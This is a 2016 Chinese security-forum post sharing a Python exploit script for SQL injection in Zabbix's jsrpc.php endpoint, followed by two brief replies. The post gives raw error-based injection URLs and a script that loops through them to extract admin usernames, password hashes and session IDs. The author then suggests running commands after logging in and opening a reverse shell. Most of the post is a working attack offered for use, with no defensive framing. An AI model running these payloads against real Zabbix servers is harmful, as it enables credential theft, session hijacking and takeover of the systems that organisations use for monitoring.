zabbix注入利用脚本

wuyan · 发表于 2016-8-18 18:11:17

本帖最后由 wuyan 于 2016-8-18 19:27 编辑

没什么好讲的，分析的文章页不想写了，就是insert注入。

[Python] 纯文本查看 复制代码

#/usr/bin/python
#*-*coding=utf-8*-*
import requests
import re
import sys
'''
===getpass payloads===
1./jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit 1,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1
2./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,alias,0x7e,passwd,0x7e))+from+zabbix.users+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
===session 获取===
1./jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,(select(select+concat(0x7e,sessionid,0x7e))+from+sessions+LIMIT+0,1),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
'''

def getpass(url,num):
	payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&\
	hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
		(rand(0)*2), (select concat(0x7e,0x7e,alias,0x3a,passwd,0x7e,0x7e) from users limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
	tempurl = url + payloads
	response = req = requests.get(tempurl).content
	return response

def filter(content):
	try:
		result = re.findall(r"~~(.*?)~~",content)[0]
		print result
		return True
	except Exception, e:
		return False

def getsession(url,num):
	payloads = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&\
	hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
		(rand(0)*2), (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=\
showlatest&filter=&filter_task=&mark_color=1' % str(num)
	tempurl = url + payloads
	response = req = requests.get(tempurl).content
	return response

def usage():
    print "   usage1: 	 python zabbix.py xxx.com passwd"
    print "   usage2:	 python zabbix.py xxx.com session\n"
if __name__ == '__main__':
	logo = '''\n
	 _____     _     _     _      _____           _    
	|__  /__ _| |__ | |__ (_)_  _|  ___|   _  ___| | __
	  / // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
	 / /| (_| | |_) | |_) | |>  <|  _|| |_| | (__|   < 
	/____\__,_|_.__/|_.__/|_/_/\_\_|   \__,_|\___|_|\_\
	
	\n  **************coded by bsmali4 2016-8-16*****************
	'''
	print logo
	if len(sys.argv) != 3:
		usage()
	else:
		host = sys.argv[1].strip('/')
		method = sys.argv[2]
		if method == 'passwd':
			for i in range (0,999):
				response = getpass(host,i)
				if not filter(response):
					break
		elif method == 'session':
			for i in range(0,999):
				response = getsession(host,i)
				if not filter(response):
					break

登陆后台后可以直接执行命令，反弹shell什么的是极好的

冰琥珀 · 发表于 2016-8-19 14:21:57

这样真的好么，信不信我也直接丢个汇编代码然后说没啥好写的

No0d1es · 发表于 2016-8-20 09:59:52

卧槽，居然没人来捧场。

[漏洞] zabbix注入利用脚本

指导单位

旗下站点

联系我们